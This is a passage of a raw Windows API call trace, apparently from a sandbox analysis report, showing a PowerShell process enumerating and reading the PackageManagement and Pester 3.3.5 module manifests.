	[0047.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd50) returned 1
	[0047.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db20) returned 1
	[0047.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da70) returned 1
	[0047.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da30) returned 1
	[0047.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db20) returned 1
	[0047.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da70) returned 1
	[0048.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da30) returned 1
	[0048.005] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44
	[0048.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db50) returned 1
	[0048.009] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b
	[0048.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18daf0) returned 1
	[0048.009] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x67c
	[0048.010] GetFileType (hFile=0x67c) returned 0x1
	[0048.010] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da60) returned 1
	[0048.010] GetFileType (hFile=0x67c) returned 0x1
	[0048.010] ReadFile (in: hFile=0x67c, lpBuffer=0x150473e7bd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x150473e7bd0*, lpNumberOfBytesRead=0x184c18dbc8*=0x5f8, lpOverlapped=0x0) returned 1
	[0048.011] ReadFile (in: hFile=0x67c, lpBuffer=0x150473e7108, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x150473e7108*, lpNumberOfBytesRead=0x184c18dbc8*=0x0, lpOverlapped=0x0) returned 1
	[0048.011] ReadFile (in: hFile=0x67c, lpBuffer=0x150473e7bd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x150473e7bd0*, lpNumberOfBytesRead=0x184c18dbc8*=0x0, lpOverlapped=0x0) returned 1
	[0048.011] CloseHandle (hObject=0x67c) returned 1
	[0048.016] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff
	[0048.017] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff
	[0048.017] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff
	[0048.017] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff
	[0048.017] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff
	[0048.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.017] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31
	[0048.017] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32
	[0048.017] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7860
	[0048.017] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0048.018] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0048.018] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0048.018] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0048.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.018] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31
	[0048.018] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32
	[0048.018] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7620
	[0048.018] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0048.019] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0048.019] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0048.019] FindClose (in: hFindFile=0x1505fab7620 | out: hFindFile=0x1505fab7620) returned 1
	[0048.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db20) returned 1
	[0048.019] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37
	[0048.019] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x184c18d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38
	[0048.019] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x184c18d7c0 | out: lpFindFileData=0x184c18d7c0) returned 0x1505fab74a0
	[0048.019] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.020] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.020] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.020] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.020] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.020] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.020] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.020] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.020] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.020] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.020] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.021] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.021] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.021] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.021] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.021] FindNextFileW (in: hFindFile=0x1505fab74a0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 0
	[0048.021] FindClose (in: hFindFile=0x1505fab74a0 | out: hFindFile=0x1505fab74a0) returned 1
	[0048.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da70) returned 1
	[0048.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da30) returned 1
	[0048.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db20) returned 1
	[0048.021] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37
	[0048.021] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x184c18d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38
	[0048.021] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x184c18d7c0 | out: lpFindFileData=0x184c18d7c0) returned 0x1505fab7ce0
	[0048.021] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.022] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.022] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.022] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.022] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.022] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.022] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.022] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.022] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.022] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.022] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.023] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.023] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.023] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.023] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.023] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 0
	[0048.023] FindClose (in: hFindFile=0x1505fab7ce0 | out: hFindFile=0x1505fab7ce0) returned 1
	[0048.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da70) returned 1
	[0048.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da30) returned 1
	[0048.023] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x184c18d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37
	[0048.023] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x184c18d710, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37
	[0048.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db50) returned 1
	[0048.023] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x184c18dc30 | out: lpFileInformation=0x184c18dc30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0048.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18db10) returned 1
	[0048.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db80) returned 1
	[0048.024] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x184c18d670, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37
	[0048.024] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38
	[0048.024] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x184c18d820 | out: lpFindFileData=0x184c18d820) returned 0x1505fab8940
	[0048.024] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.024] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.024] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.024] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.024] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.024] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.024] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.025] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.025] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.025] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.025] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.025] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.025] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.025] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.025] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.025] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 0
	[0048.025] FindClose (in: hFindFile=0x1505fab8940 | out: hFindFile=0x1505fab8940) returned 1
	[0048.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dad0) returned 1
	[0048.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da90) returned 1
	[0048.026] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff
	[0048.026] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff
	[0048.026] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff
	[0048.026] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff
	[0048.026] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff
	[0048.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31
	[0048.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.026] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0048.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.027] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31
	[0048.027] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32
	[0048.027] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab82e0
	[0048.027] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0048.027] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0048.027] FindNextFileW (in: hFindFile=0x1505fab82e0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0048.027] FindClose (in: hFindFile=0x1505fab82e0 | out: hFindFile=0x1505fab82e0) returned 1
	[0048.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.027] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x184c18d910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43
	[0048.027] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd50) returned 1
	[0048.027] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de30 | out: lpFileInformation=0x184c18de30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1
	[0048.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd10) returned 1
	[0048.028] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43
	[0048.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18daf0) returned 1
	[0048.028] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x67c
	[0048.028] GetFileType (hFile=0x67c) returned 0x1
	[0048.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da60) returned 1
	[0048.028] GetFileType (hFile=0x67c) returned 0x1
	[0048.028] ReadFile (in: hFile=0x67c, lpBuffer=0x15047403988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047403988*, lpNumberOfBytesRead=0x184c18dbc8*=0x1000, lpOverlapped=0x0) returned 1
	[0048.029] ReadFile (in: hFile=0x67c, lpBuffer=0x15047403988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047403988*, lpNumberOfBytesRead=0x184c18dbc8*=0x1000, lpOverlapped=0x0) returned 1
	[0048.029] ReadFile (in: hFile=0x67c, lpBuffer=0x15047403988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047403988*, lpNumberOfBytesRead=0x184c18dbc8*=0x1000, lpOverlapped=0x0) returned 1
	[0048.029] ReadFile (in: hFile=0x67c, lpBuffer=0x15047403988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047403988*, lpNumberOfBytesRead=0x184c18dbc8*=0x5e5, lpOverlapped=0x0) returned 1
	[0048.029] ReadFile (in: hFile=0x67c, lpBuffer=0x15047402ead, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047402ead*, lpNumberOfBytesRead=0x184c18dbc8*=0x0, lpOverlapped=0x0) returned 1
	[0048.029] ReadFile (in: hFile=0x67c, lpBuffer=0x15047403988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047403988*, lpNumberOfBytesRead=0x184c18dbc8*=0x0, lpOverlapped=0x0) returned 1
	[0048.030] CloseHandle (hObject=0x67c) returned 1
	[0048.032] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff
	[0048.032] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff
